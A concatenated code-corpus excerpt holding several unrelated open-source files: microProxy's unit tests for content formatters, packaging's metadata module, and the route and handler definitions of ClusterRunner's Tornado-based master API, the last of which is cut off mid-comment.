'pairwise_distances',
'pairwise_distances_argmin',
'pairwise_distances_argmin_min',
'pairwise_distances_argmin_min',
'pairwise_kernels',
'precision_recall_curve',
'precision_recall_fscore_support',
'precision_score',
'r2_score',
'recall_score',
'roc_auc_score',
'roc_curve',
'SCORERS',
'silhouette_samples',
'silhouette_score',
'v_measure_score',
'zero_one_loss',
'brier_score_loss',
]
|
bsd-3-clause
|
mike820324/microProxy
|
microproxy/test/viewer/test_formatter.py
|
1
|
20945
|
import StringIO
import gzip
import mock
from pygments.token import Token
import unittest
from microproxy.context import HttpHeaders
from microproxy.viewer.formatter import (
CssFormatter, ConsoleFormatter, HtmlFormatter, JsFormatter,
JsonFormatter, PlainTextFormatter, TuiFormatter,
URLEncodedFormatter, XmlFormatter)
def _gzip_body(body):
out = StringIO.StringIO()
with gzip.GzipFile(fileobj=out, mode="w") as f:
f.write(body)
return out.getvalue()
class TestCssFormatter(unittest.TestCase):
def setUp(self):
self.formatter = CssFormatter()
self.css_content = ".class {background: black} #id {color: red}"
def test_match(self):
self.assertTrue(self.formatter.match(None, "text/css"))
self.assertFalse(self.formatter.match(None, "text/plain"))
def test_format_body(self):
self.assertEqual(
self.formatter.format_body(self.css_content),
(".class {\n"
" background: black\n"
" }\n"
"#id {\n"
" color: red\n"
" }"))
def test_format_tui(self):
contents = self.formatter.format_tui(self.css_content)
self.assertEqual(len(contents), 6)
self.assertEqual(
contents[0].content,
[(Token.Name.Class, u'.class'), (Token.Text, u' '), (Token.Punctuation, u'{')])
self.assertEqual(
contents[1].content,
[(Token.Name.Builtin, u'background'), (Token.Operator, u':'), (Token.Text, u' '), (Token.Name.Builtin, u'black')])
self.assertEqual(
contents[2].content,
[(Token.Punctuation, u'}')])
self.assertEqual(
contents[3].content,
[(Token.Name.Namespace, u'#id'), (Token.Text, u' '), (Token.Punctuation, u'{')])
self.assertEqual(
contents[4].content,
[(Token.Name.Builtin, u'color'), (Token.Operator, u':'), (Token.Text, u' '), (Token.Name.Builtin, u'red')])
self.assertEqual(
contents[5].content,
[(Token.Punctuation, u'}')])
class TestJsFormatter(unittest.TestCase):
def setUp(self):
self.formatter = JsFormatter()
self.js_content = "var person = {firstname:\"John\",lastname:\"Doe\",age:50,eyecolor:\"blue\"};document.getElementById(\"demo\").innerHTML =person.firstname + \" is \" + person.age + \" years old.\";"
def test_match(self):
self.assertTrue(self.formatter.match(None, "text/javascript"))
self.assertTrue(self.formatter.match(None, "application/javascript"))
self.assertTrue(self.formatter.match(None, "application/x-javascript"))
self.assertFalse(self.formatter.match(None, "text/plain"))
def test_format_body(self):
self.assertEqual(
self.formatter.format_body(self.js_content),
("var person = {\n"
" firstname: \"John\",\n"
" lastname: \"Doe\",\n"
" age: 50,\n"
" eyecolor: \"blue\"\n"
"};\n"
"document.getElementById(\"demo\").innerHTML "
"= person.firstname + \" is \" + person.age + \" years old.\";"))
def test_format_tui(self):
contents = self.formatter.format_tui(self.js_content)
self.assertEqual(len(contents), 7)
self.assertEqual(
contents[0].content,
[(Token.Keyword.Declaration, u'var'), (Token.Text, u' '), (Token.Name.Other, u'person'), (Token.Text, u' '), (Token.Operator, u'='), (Token.Text, u' '), (Token.Punctuation, u'{')])
self.assertEqual(
contents[1].content,
[(Token.Name.Other, u'firstname'), (Token.Operator, u':'), (Token.Text, u' '), (Token.Literal.String.Double, u'"John"'), (Token.Punctuation, u',')])
self.assertEqual(
contents[2].content,
[(Token.Name.Other, u'lastname'), (Token.Operator, u':'), (Token.Text, u' '), (Token.Literal.String.Double, u'"Doe"'), (Token.Punctuation, u',')])
self.assertEqual(
contents[3].content,
[(Token.Name.Other, u'age'), (Token.Operator, u':'), (Token.Text, u' '), (Token.Literal.Number.Integer, u'50'), (Token.Punctuation, u',')])
self.assertEqual(
contents[4].content,
[(Token.Name.Other, u'eyecolor'), (Token.Operator, u':'), (Token.Text, u' '), (Token.Literal.String.Double, u'"blue"')])
self.assertEqual(
contents[5].content,
[(Token.Punctuation, u'}'), (Token.Punctuation, u';')])
self.assertEqual(
contents[6].content,
[(Token.Name.Builtin, u'document'), (Token.Punctuation, u'.'), (Token.Name.Other, u'getElementById'),
(Token.Punctuation, u'('), (Token.Literal.String.Double, u'"demo"'),
(Token.Punctuation, u')'), (Token.Punctuation, u'.'), (Token.Name.Other, u'innerHTML'),
(Token.Text, u' '), (Token.Operator, u'='), (Token.Text, u' '),
(Token.Name.Other, u'person'), (Token.Punctuation, u'.'),
(Token.Name.Other, u'firstname'), (Token.Text, u' '),
(Token.Operator, u'+'), (Token.Text, u' '), (Token.Literal.String.Double, u'" is "'),
(Token.Text, u' '), (Token.Operator, u'+'), (Token.Text, u' '),
(Token.Name.Other, u'person'), (Token.Punctuation, u'.'), (Token.Name.Other, u'age'),
(Token.Text, u' '), (Token.Operator, u'+'), (Token.Text, u' '),
(Token.Literal.String.Double, u'" years old."'), (Token.Punctuation, u';')])
class TestHtmlFormatter(unittest.TestCase):
def setUp(self):
self.formatter = HtmlFormatter()
self.html_content = (
"<html><head><title>Hello MicroProxy</title</head>"
"<body>Hello MicroProxy</body></html>")
def test_match(self):
self.assertTrue(self.formatter.match(None, "text/html"))
self.assertFalse(self.formatter.match(None, "text/plain"))
def test_format_body(self):
self.assertEqual(
self.formatter.format_body(self.html_content),
("<html>\n"
" <head>\n"
" <title>Hello MicroProxy</title>\n"
" </head>\n"
" <body>Hello MicroProxy</body>\n"
"</html>\n"))
def test_format_tui(self):
contents = self.formatter.format_tui(self.html_content)
self.assertEqual(len(contents), 6)
self.assertEqual(
contents[0].content,
[(Token.Punctuation, u'<'), (Token.Name.Tag, u'html'), (Token.Punctuation, u'>')])
self.assertEqual(
contents[1].content,
[(Token.Punctuation, u'<'), (Token.Name.Tag, u'head'), (Token.Punctuation, u'>')])
self.assertEqual(
contents[2].content,
[(Token.Punctuation, u'<'), (Token.Name.Tag, u'title'), (Token.Punctuation, u'>'),
(Token.Text, u'Hello MicroProxy'), (Token.Punctuation, u'<'), (Token.Punctuation, u'/'),
(Token.Name.Tag, u'title'), (Token.Punctuation, u'>')])
self.assertEqual(
contents[3].content,
[(Token.Punctuation, u'<'), (Token.Punctuation, u'/'), (Token.Name.Tag, u'head'), (Token.Punctuation, u'>')])
self.assertEqual(
contents[4].content,
[(Token.Punctuation, u'<'), (Token.Name.Tag, u'body'), (Token.Punctuation, u'>'),
(Token.Text, u'Hello MicroProxy'), (Token.Punctuation, u'<'), (Token.Punctuation, u'/'),
(Token.Name.Tag, u'body'), (Token.Punctuation, u'>')])
self.assertEqual(
contents[5].content,
[(Token.Punctuation, u'<'), (Token.Punctuation, u'/'), (Token.Name.Tag, u'html'), (Token.Punctuation, u'>')])
class TestJsonFormatter(unittest.TestCase):
def setUp(self):
self.formatter = JsonFormatter()
self.json_content = "{\"title\":\"MicroPorxy\",\"rate\":100,\"awesome\":true}"
def test_match(self):
self.assertTrue(self.formatter.match(None, "application/json"))
self.assertFalse(self.formatter.match(None, "text/plain"))
def test_format_body(self):
self.assertEqual(
self.formatter.format_body(self.json_content),
("{\n"
" \"title\": \"MicroPorxy\", \n"
" \"rate\": 100, \n"
" \"awesome\": true\n"
"}"))
def test_format_tui(self):
contents = self.formatter.format_tui(self.json_content)
self.assertEqual(len(contents), 5)
self.assertEqual(
contents[0].content,
[(Token.Punctuation, u'{')])
self.assertEqual(
contents[1].content,
[(Token.Name.Tag, u'"title"'), (Token.Punctuation, u':'), (Token.Text, u' '),
(Token.Literal.String.Double, u'"MicroPorxy"'), (Token.Punctuation, u',')])
self.assertEqual(
contents[2].content,
[(Token.Name.Tag, u'"rate"'), (Token.Punctuation, u':'), (Token.Text, u' '),
(Token.Literal.Number.Integer, u'100'), (Token.Punctuation, u',')])
self.assertEqual(
contents[3].content,
[(Token.Name.Tag, u'"awesome"'), (Token.Punctuation, u':'), (Token.Text, u' '),
(Token.Keyword.Constant, u'true')])
self.assertEqual(
contents[4].content,
[(Token.Punctuation, u'}')])
class TestXmlFormatter(unittest.TestCase):
def setUp(self):
self.formatter = XmlFormatter()
self.xml_content = "<microproxy><title>MicroProxy</title><rate>100</rate><awesome>true</awesome></microproxy>"
def test_match(self):
self.assertTrue(self.formatter.match(None, "text/xml"))
self.assertTrue(self.formatter.match(None, "application/xml"))
self.assertFalse(self.formatter.match(None, "text/plain"))
def test_format_body(self):
self.assertEqual(
self.formatter.format_body(self.xml_content),
("<microproxy>\n"
" <title>MicroProxy</title>\n"
" <rate>100</rate>\n"
" <awesome>true</awesome>\n"
"</microproxy>\n"))
def test_format_tui(self):
contents = self.formatter.format_tui(self.xml_content)
self.assertEqual(len(contents), 5)
self.assertEqual(
contents[0].content,
[(Token.Name.Tag, u'<microproxy'), (Token.Name.Tag, u'>')])
self.assertEqual(
contents[1].content,
[(Token.Name.Tag, u'<title'), (Token.Name.Tag, u'>'), (Token.Text, u'MicroProxy'),
(Token.Name.Tag, u'</title>')])
self.assertEqual(
contents[2].content,
[(Token.Name.Tag, u'<rate'), (Token.Name.Tag, u'>'), (Token.Text, u'100'),
(Token.Name.Tag, u'</rate>')])
self.assertEqual(
contents[3].content,
[(Token.Name.Tag, u'<awesome'), (Token.Name.Tag, u'>'), (Token.Text, u'true'),
(Token.Name.Tag, u'</awesome>')])
self.assertEqual(
contents[4].content,
[(Token.Name.Tag, u'</microproxy>')])
class TestPlainTextFormatter(unittest.TestCase):
def setUp(self):
self.formatter = PlainTextFormatter()
self.content = "Hello,\nthis is MicroProxy!"
def test_match(self):
self.assertTrue(self.formatter.match(None, "text/plain"))
self.assertFalse(self.formatter.match(None, "text/css"))
def test_format_body(self):
self.assertEqual(
self.formatter.format_body(self.content),
"Hello,\nthis is MicroProxy!")
def test_format_tui(self):
contents = self.formatter.format_tui(self.content)
self.assertEqual(len(contents), 2)
self.assertEqual(
contents[0].content, "Hello,")
self.assertEqual(
contents[1].content, "this is MicroProxy!")
class TestURLEncodedFormatter(unittest.TestCase):
def setUp(self):
self.formatter = URLEncodedFormatter()
self.normal_content = "arg1=value1&arg2=100&arg3=true&longarg=this%20is%20long"
self.complex_content = (
"arg1=value1&"
"jsonarg={\"key\":\"value\"}&"
"xmlarg=<xml><text>hello</text></xml>")
def test_match(self):
self.assertTrue(self.formatter.match(None, "application/x-www-form-urlencoded"))
self.assertFalse(self.formatter.match(None, "text/plain"))
def test_format_body_normal(self):
self.assertEqual(
self.formatter.format_body(self.normal_content),
("arg1 : value1\n"
"arg2 : 100\n"
"arg3 : true\n"
"longarg: this is long"))
def test_format_tui_normal(self):
contents = self.formatter.format_tui(self.normal_content)
self.assertEqual(len(contents), 4)
self.assertEqual(contents[0].content, "arg1 : value1")
self.assertEqual(contents[1].content, "arg2 : 100")
self.assertEqual(contents[2].content, "arg3 : true")
self.assertEqual(contents[3].content, "longarg: this is long")
def test_format_body_complex(self):
self.assertEqual(
self.formatter.format_body(self.complex_content),
("arg1 : value1\n"
"jsonarg:\n"
"{\n"
" \"key\": \"value\"\n"
"}\n"
"xmlarg :\n"
"<xml>\n"
" <text>hello</text>\n"
"</xml>\n"))
def test_format_tui_complex(self):
contents = self.formatter.format_tui(self.complex_content)
self.assertEqual(len(contents), 9)
self.assertEqual(contents[0].content, "arg1 : value1")
self.assertEqual(contents[1].content, "jsonarg:")
self.assertEqual(contents[2].content, [(Token.Punctuation, u'{')])
self.assertEqual(
contents[3].content,
[(Token.Name.Tag, u'"key"'), (Token.Punctuation, u':'), (Token.Text, u' '),
(Token.Literal.String.Double, u'"value"')])
self.assertEqual(contents[4].content, [(Token.Punctuation, u'}')])
self.assertEqual(contents[5].content, "xmlarg :")
self.assertEqual(
contents[6].content,
[(Token.Name.Tag, u'<xml'), (Token.Name.Tag, u'>')])
self.assertEqual(
contents[7].content,
[(Token.Name.Tag, u'<text'), (Token.Name.Tag, u'>'), (Token.Text, u'hello'),
(Token.Name.Tag, u'</text>')])
self.assertEqual(contents[8].content, [(Token.Name.Tag, u'</xml>')])
def test_format_empty(self):
self.assertEqual(
self.formatter.format_body(""), "")
self.assertEqual(
self.formatter.format_tui(""), [])
class TestFormatterMixin(object):
DEFAULT_HEADERS = HttpHeaders([
("content-type", "text/plain; charset=utf-8")])
def setUp(self):
self.mock_formatters = mock.Mock()
self.formatters = [
self.mock_formatters.first,
self.mock_formatters.second]
self.formatter = None
def assert_called(self, formatter, *args, **kwargs):
raise NotImplementedError
def assert_not_called(self, formatter):
raise NotImplementedError
def test_match_first(self):
self.mock_formatters.first.match = mock.Mock(
return_value=True)
self.mock_formatters.first.format_tui = mock.Mock(
return_value="formatted body")
self.mock_formatters.first.format_console = mock.Mock(
return_value="formatted body")
formatted_body = self.formatter.format_body("body", self.DEFAULT_HEADERS)
self.assertEqual(formatted_body, "formatted body")
self.mock_formatters.first.match.assert_called_with(
self.DEFAULT_HEADERS, "text/plain")
self.mock_formatters.second.match.assert_not_called()
self.assert_called(self.mock_formatters.first, "body")
self.assert_not_called(self.mock_formatters.second)
def test_match_second(self):
self.mock_formatters.first.match = mock.Mock(
return_value=False)
self.mock_formatters.second.match = mock.Mock(
return_value=True)
self.mock_formatters.second.format_tui = mock.Mock(
return_value="formatted body")
self.mock_formatters.second.format_console = mock.Mock(
return_value="formatted body")
formatted_body = self.formatter.format_body("body", self.DEFAULT_HEADERS)
self.assertEqual(formatted_body, "formatted body")
self.mock_formatters.first.match.assert_called_with(
self.DEFAULT_HEADERS, "text/plain")
self.mock_formatters.second.match.assert_called_with(
self.DEFAULT_HEADERS, "text/plain")
self.assert_not_called(self.mock_formatters.first)
self.assert_called(self.mock_formatters.second, "body")
def test_no_match(self):
self.mock_formatters.first.match = mock.Mock(
return_value=False)
self.mock_formatters.second.match = mock.Mock(
return_value=False)
formatted_body = self.formatter.format_body("body", self.DEFAULT_HEADERS)
self.assertEqual(formatted_body, self.formatter.default("body"))
self.mock_formatters.first.match.assert_called_with(
self.DEFAULT_HEADERS, "text/plain")
self.mock_formatters.second.match.assert_called_with(
self.DEFAULT_HEADERS, "text/plain")
self.assert_not_called(self.mock_formatters.first)
self.assert_not_called(self.mock_formatters.second)
def test_match_but_format_format(self):
self.mock_formatters.first.match = mock.Mock(
return_value=True)
self.mock_formatters.second.match = mock.Mock(
return_value=False)
self.mock_formatters.first.format_tui = mock.Mock(
side_effect=ValueError)
self.mock_formatters.first.format_console = mock.Mock(
side_effect=ValueError)
formatted_body = self.formatter.format_body("body", self.DEFAULT_HEADERS)
self.assertEqual(formatted_body, self.formatter.default("body"))
self.mock_formatters.first.match.assert_called_with(
self.DEFAULT_HEADERS, "text/plain")
self.mock_formatters.second.match.assert_called_with(
self.DEFAULT_HEADERS, "text/plain")
self.assert_called(self.mock_formatters.first, "body")
self.assert_not_called(self.mock_formatters.second)
def test_gzip(self):
self.mock_formatters.first.match = mock.Mock(
return_value=True)
self.mock_formatters.first.format_tui = mock.Mock(
return_value="formatted body")
self.mock_formatters.first.format_console = mock.Mock(
return_value="formatted body")
headers = HttpHeaders([
("content-type", "text/plain"),
("content-encoding", "gzip")])
formatted_body = self.formatter.format_body(
_gzip_body("body"), headers)
self.assertEqual(formatted_body, "formatted body")
self.mock_formatters.first.match.assert_called_with(
headers, "text/plain")
self.mock_formatters.second.match.assert_not_called()
self.assert_called(self.mock_formatters.first, "body")
self.assert_not_called(self.mock_formatters.second)
def test_no_content_type(self):
self.mock_formatters.first.match = mock.Mock(
return_value=False)
self.mock_formatters.second.match = mock.Mock(
return_value=False)
empty_headers = HttpHeaders([])
formatted_body = self.formatter.format_body("body", empty_headers)
self.assertEqual(formatted_body, self.formatter.default("body"))
self.mock_formatters.first.match.assert_called_with(
empty_headers, "")
self.mock_formatters.second.match.assert_called_with(
empty_headers, "")
self.assert_not_called(self.mock_formatters.first)
self.assert_not_called(self.mock_formatters.second)
class TestTuiFormatter(TestFormatterMixin, unittest.TestCase):
def setUp(self):
super(TestTuiFormatter, self).setUp()
self.formatter = TuiFormatter(self.formatters)
def assert_called(self, formatter, *args, **kwargs):
formatter.format_tui.assert_called_with(*args, **kwargs)
def assert_not_called(self, formatter):
formatter.format_tui.assert_not_called()
class TestConsoleFormatter(TestFormatterMixin, unittest.TestCase):
def setUp(self):
super(TestConsoleFormatter, self).setUp()
self.formatter = ConsoleFormatter(self.formatters)
def assert_called(self, formatter, *args, **kwargs):
formatter.format_console.assert_called_with(*args, **kwargs)
def assert_not_called(self, formatter):
formatter.format_console.assert_not_called()
|
mit
|
yrizk/django-blog
|
blogvenv/lib/python3.4/site-packages/pkg_resources/_vendor/packaging/__about__.py
|
257
|
1073
|
# Copyright 2014 Donald Stufft
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function
__all__ = [
"__title__", "__summary__", "__uri__", "__version__", "__author__",
"__email__", "__license__", "__copyright__",
]
__title__ = "packaging"
__summary__ = "Core utilities for Python packages"
__uri__ = "https://github.com/pypa/packaging"
__version__ = "15.0"
__author__ = "Donald Stufft"
__email__ = "[email protected]"
__license__ = "Apache License, Version 2.0"
__copyright__ = "Copyright 2014 %s" % __author__
|
apache-2.0
|
box/ClusterRunner
|
app/web_framework/cluster_master_application.py
|
1
|
18073
|
import http.client
import os
import urllib.parse
import tornado.web
import prometheus_client
from app.master.slave import SlaveRegistry
from app.util import analytics
from app.util import log
from app.util.conf.configuration import Configuration
from app.util.decorators import authenticated
from app.util.exceptions import ItemNotFoundError
from app.util.url_builder import UrlBuilder
from app.web_framework.cluster_application import ClusterApplication
from app.web_framework.cluster_base_handler import ClusterBaseAPIHandler, ClusterBaseHandler
from app.web_framework.route_node import RouteNode
# pylint: disable=attribute-defined-outside-init
# Handler classes are not designed to have __init__ overridden.
class ClusterMasterApplication(ClusterApplication):
def __init__(self, cluster_master):
"""
:type cluster_master: app.master.cluster_master.ClusterMaster
"""
default_params = {
'cluster_master': cluster_master,
}
# The routes are described using a tree structure. This is a better representation of a path than a flat list
# of strings and allows us to inspect children/parents of a node to generate 'child routes'
api_v1 = [
RouteNode(r'v1', _APIVersionOneHandler).add_children([
RouteNode(r'metrics', _MetricsHandler),
RouteNode(r'version', _VersionHandler),
RouteNode(r'build', _BuildsHandler, 'builds').add_children([
RouteNode(r'(\d+)', _BuildHandler, 'build').add_children([
RouteNode(r'result', _BuildResultRedirectHandler),
RouteNode(r'artifacts.tar.gz', _BuildTarResultHandler),
RouteNode(r'artifacts.zip', _BuildZipResultHandler),
RouteNode(r'subjob', _SubjobsHandler, 'subjobs').add_children([
RouteNode(r'(\d+)', _SubjobHandler, 'subjob').add_children([
RouteNode(r'atom', _AtomsHandler, 'atoms').add_children([
RouteNode(r'(\d+)', _AtomHandler, 'atom').add_children([
RouteNode(r'console', _AtomConsoleHandler),
]),
]),
RouteNode(r'result', _SubjobResultHandler),
]),
]),
]),
]),
RouteNode(r'queue', _QueueHandler),
RouteNode(r'slave', _SlavesHandler, 'slaves').add_children([
RouteNode(r'(\d+)', _SlaveHandler, 'slave').add_children([
RouteNode(r'shutdown', _SlaveShutdownHandler, 'shutdown'),
RouteNode(r'heartbeat', _SlavesHeartbeatHandler),
]),
RouteNode(r'shutdown', _SlavesShutdownHandler, 'shutdown'),
]),
RouteNode(r'eventlog', _EventlogHandler)])]
api_v2 = [
RouteNode(r'metrics', _MetricsHandler),
RouteNode(r'version', _VersionHandler),
RouteNode(r'builds', _V2BuildsHandler).add_children([
RouteNode(r'(\d+)', _BuildHandler, 'build').add_children([
RouteNode(r'result', _BuildResultRedirectHandler),
RouteNode(r'artifacts.tar.gz', _BuildTarResultHandler),
RouteNode(r'artifacts.zip', _BuildZipResultHandler),
RouteNode(r'subjobs', _V2SubjobsHandler,).add_children([
RouteNode(r'(\d+)', _SubjobHandler, 'subjob').add_children([
RouteNode(r'atoms', _V2AtomsHandler).add_children([
RouteNode(r'(\d+)', _AtomHandler, 'atom').add_children([
RouteNode(r'console', _AtomConsoleHandler),
]),
]),
RouteNode(r'result', _SubjobResultHandler),
]),
]),
]),
]),
RouteNode(r'queue', _QueueHandler),
RouteNode(r'slaves', _SlavesHandler).add_children([
RouteNode(r'(\d+)', _SlaveHandler, 'slave').add_children([
RouteNode(r'shutdown', _SlaveShutdownHandler),
RouteNode(r'heartbeat', _SlavesHeartbeatHandler),
]),
RouteNode(r'shutdown', _SlavesShutdownHandler),
]),
RouteNode(r'eventlog', _EventlogHandler)]
root = RouteNode(r'/', _RootHandler)
root.add_children(api_v1, version=1)
root.add_children(api_v2, version=2)
handlers = self.get_all_handlers(root, default_params)
super().__init__(handlers)
class _ClusterMasterBaseAPIHandler(ClusterBaseAPIHandler):
def initialize(self, route_node=None, cluster_master=None):
"""
:type route_node: RouteNode
:type cluster_master: app.master.cluster_master.ClusterMaster
"""
self._logger = log.get_logger(__name__)
self._cluster_master = cluster_master
super().initialize(route_node)
class _RootHandler(_ClusterMasterBaseAPIHandler):
pass
class _APIVersionOneHandler(_ClusterMasterBaseAPIHandler):
def get(self):
response = {
'master': self._cluster_master.api_representation(),
}
self.write(response)
class _VersionHandler(_ClusterMasterBaseAPIHandler):
def get(self):
response = {
'version': Configuration['version'],
'api_version': self.api_version,
}
self.write(response)
class _MetricsHandler(_ClusterMasterBaseAPIHandler):
def get(self):
self.write_text(prometheus_client.exposition.generate_latest(prometheus_client.core.REGISTRY))
class _QueueHandler(_ClusterMasterBaseAPIHandler):
def get(self):
response = {
'queue': [build.api_representation() for build in self._cluster_master.active_builds()]
}
self.write(response)
class _SubjobsHandler(_ClusterMasterBaseAPIHandler):
def get(self, build_id):
build = self._cluster_master.get_build(int(build_id))
response = {
'subjobs': [subjob.api_representation() for subjob in build.get_subjobs()]
}
self.write(response)
class _V2SubjobsHandler(_SubjobsHandler):
def get(self, build_id):
offset, limit = self.get_pagination_params()
build = self._cluster_master.get_build(int(build_id))
response = {
'subjobs': [subjob.api_representation() for subjob in build.get_subjobs(offset, limit)]
}
self.write(response)
class _SubjobHandler(_ClusterMasterBaseAPIHandler):
def get(self, build_id, subjob_id):
build = self._cluster_master.get_build(int(build_id))
subjob = build.subjob(int(subjob_id))
response = {
'subjob': subjob.api_representation()
}
self.write(response)
class _SubjobResultHandler(_ClusterMasterBaseAPIHandler):
def post(self, build_id, subjob_id):
slave_url = self.decoded_body.get('slave')
slave = SlaveRegistry.singleton().get_slave(slave_url=slave_url)
file_payload = self.request.files.get('file')
if not file_payload:
raise RuntimeError('Result file not provided')
slave_executor_id = self.decoded_body.get('metric_data', {}).get('executor_id')
analytics.record_event(analytics.MASTER_RECEIVED_RESULT, executor_id=slave_executor_id, build_id=int(build_id),
subjob_id=int(subjob_id), slave_id=slave.id)
self._cluster_master.handle_result_reported_from_slave(
slave_url, int(build_id), int(subjob_id), file_payload[0])
self._write_status()
def get(self, build_id, subjob_id):
# TODO: return the subjob's result archive here?
self.write({'status': 'not implemented'})
class _AtomsHandler(_ClusterMasterBaseAPIHandler):
def get(self, build_id, subjob_id):
build = self._cluster_master.get_build(int(build_id))
subjob = build.subjob(int(subjob_id))
response = {
'atoms': [atom.api_representation() for atom in subjob.atoms()],
}
self.write(response)
class _V2AtomsHandler(_AtomsHandler):
def get(self, build_id, subjob_id):
offset, limit = self.get_pagination_params()
build = self._cluster_master.get_build(int(build_id))
subjob = build.subjob(int(subjob_id))
response = {
'atoms': [atom.api_representation() for atom in subjob.get_atoms(offset, limit)],
}
self.write(response)
class _AtomHandler(_ClusterMasterBaseAPIHandler):
def get(self, build_id, subjob_id, atom_id):
build = self._cluster_master.get_build(int(build_id))
subjob = build.subjob(int(subjob_id))
atoms = subjob.atoms
response = {
'atom': atoms[int(atom_id)].api_representation(),
}
self.write(response)
class _AtomConsoleHandler(_ClusterMasterBaseAPIHandler):
def get(self, build_id, subjob_id, atom_id):
"""
:type build_id: int
:type subjob_id: int
:type atom_id: int
"""
max_lines = int(self.get_query_argument('max_lines', 50))
offset_line = self.get_query_argument('offset_line', None)
if offset_line is not None:
offset_line = int(offset_line)
try:
response = self._cluster_master.get_console_output(
build_id,
subjob_id,
atom_id,
Configuration['results_directory'],
max_lines,
offset_line
)
self.write(response)
return
except ItemNotFoundError as e:
# If the master doesn't have the atom's console output, it's possible it's currently being worked on,
# in which case the slave that is working on it may be able to provide the in-progress console output.
build = self._cluster_master.get_build(int(build_id))
subjob = build.subjob(int(subjob_id))
slave = subjob.slave
if slave is None:
raise e
api_url_builder = UrlBuilder(slave.url)
slave_console_url = api_url_builder.url('build', build_id, 'subjob', subjob_id, 'atom', atom_id, 'console')
query = {'max_lines': max_lines}
if offset_line is not None:
query['offset_line'] = offset_line
query_string = urllib.parse.urlencode(query)
self.redirect('{}?{}'.format(slave_console_url, query_string))
class _BuildsHandler(_ClusterMasterBaseAPIHandler):
@authenticated
def post(self):
build_params = self.decoded_body
success, response = self._cluster_master.handle_request_for_new_build(build_params)
status_code = http.client.ACCEPTED if success else http.client.BAD_REQUEST
self._write_status(response, success, status_code=status_code)
def get(self):
response = {
'builds': [build.api_representation() for build in self._cluster_master.get_builds()]
}
self.write(response)
class _V2BuildsHandler(_BuildsHandler):
def get(self):
offset, limit = self.get_pagination_params()
response = {
'builds': [build.api_representation() for build in self._cluster_master.get_builds(offset, limit)]
}
self.write(response)
class _BuildHandler(_ClusterMasterBaseAPIHandler):
@authenticated
def put(self, build_id):
update_params = self.decoded_body
success, response = self._cluster_master.handle_request_to_update_build(build_id, update_params)
status_code = http.client.OK if success else http.client.BAD_REQUEST
self._write_status(response, success, status_code=status_code)
def get(self, build_id):
response = {
'build': self._cluster_master.get_build(int(build_id)).api_representation(),
}
self.write(response)
class _BuildResultRedirectHandler(_ClusterMasterBaseAPIHandler):
"""
Redirect to the actual build results file download URL.
"""
def get(self, build_id):
self.redirect('/v1/build/{}/artifacts.tar.gz'.format(build_id))
class _BuildResultHandler(ClusterBaseHandler, tornado.web.StaticFileHandler):
"""
Download an artifact for the specified build. Note this class inherits from ClusterBaseHandler and
StaticFileHandler, so the semantics of this handler are a bit different than the other handlers in this file that
inherit from _ClusterMasterBaseHandler.
From the Tornado docs: "for heavy traffic it will be more efficient to use a dedicated static file server".
"""
def initialize(self, route_node=None, cluster_master=None):
"""
:param route_node: This is not used, it is only a param so we can pass route_node to all handlers without error.
In other routes, route_node is used to find child routes but filehandler routes will never show child routes.
:type route_node: RouteNode | None
:type cluster_master: app.master.cluster_master.ClusterMaster | None
"""
self._cluster_master = cluster_master
super().initialize(path=None) # we will not set the root path until the get() method is called
def get(self, build_id):
artifact_file_path = self.get_result_file_download_path(int(build_id))
self.root, artifact_filename = os.path.split(artifact_file_path)
self.set_header('Content-Type', 'application/octet-stream') # this should be downloaded as a binary file
return super().get(path=artifact_filename)
def get_result_file_download_path(self, build_id: int):
raise NotImplementedError
class _BuildTarResultHandler(_BuildResultHandler):
"""Handler for the tar archive file"""
def get_result_file_download_path(self, build_id: int):
"""Get the file path to the artifacts.tar.gz for the specified build."""
return self._cluster_master.get_path_for_build_results_archive(build_id, is_tar_request=True)
class _BuildZipResultHandler(_BuildResultHandler):
"""Handler for the zip archive file"""
def get_result_file_download_path(self, build_id: int):
"""Get the file path to the artifacts.zip for the specified build."""
return self._cluster_master.get_path_for_build_results_archive(build_id)
class _SlavesHandler(_ClusterMasterBaseAPIHandler):
def post(self):
slave_url = self.decoded_body.get('slave')
num_executors = int(self.decoded_body.get('num_executors'))
session_id = self.decoded_body.get('session_id')
response = self._cluster_master.connect_slave(slave_url, num_executors, session_id)
self._write_status(response, status_code=201)
def get(self):
response = {
'slaves': [slave.api_representation() for slave in SlaveRegistry.singleton().get_all_slaves_by_id().values()]
}
self.write(response)
class _SlaveHandler(_ClusterMasterBaseAPIHandler):
def get(self, slave_id):
slave = SlaveRegistry.singleton().get_slave(slave_id=int(slave_id))
response = {
'slave': slave.api_representation()
}
self.write(response)
@authenticated
def put(self, slave_id):
new_slave_state = self.decoded_body.get('slave', {}).get('state')
slave = SlaveRegistry.singleton().get_slave(slave_id=int(slave_id))
self._cluster_master.handle_slave_state_update(slave, new_slave_state)
self._cluster_master.update_slave_last_heartbeat_time(slave)
self._write_status({
'slave': slave.api_representation()
})
class _EventlogHandler(_ClusterMasterBaseAPIHandler):
def get(self):
# all arguments are optional, so default to None
since_timestamp = self.get_query_argument('since_timestamp', None)
since_id = self.get_query_argument('since_id', None)
self.write({
'events': analytics.get_events(since_timestamp, since_id),
})
class _SlaveShutdownHandler(_ClusterMasterBaseAPIHandler):
@authenticated
def post(self, slave_id):
slaves_to_shutdown = [int(slave_id)]
self._cluster_master.set_shutdown_mode_on_slaves(slaves_to_shutdown)
class _SlavesShutdownHandler(_ClusterMasterBaseAPIHandler):
@authenticated
def post(self):
shutdown_all = self.decoded_body.get('shutdown_all')
if shutdown_all:
slaves_to_shutdown = SlaveRegistry.singleton().get_all_slaves_by_id().keys()
else:
slaves_to_shutdown = [int(slave_id) for slave_id in self.decoded_body.get('slaves')]
self._cluster_master.set_shutdown_mode_on_slaves(slaves_to_shutdown)
class _SlavesHeartbeatHandler(_ClusterMasterBaseAPIHandler):
@authenticated
def post(self, slave_id):
slave = SlaveRegistry.singleton().get_slave(slave_id=int(slave_id))
# If the slave has been marked dead, but still sends heartbeat, the master does not update the last
# heartbeat time and the method returns false. Additionally, master responds to the slave with slave
# status. The slave will treat a is_alive=false response as a heartbeat failure, and die.
#
# The reason master returns the status to the slave instead of simply marking the slave as alive is
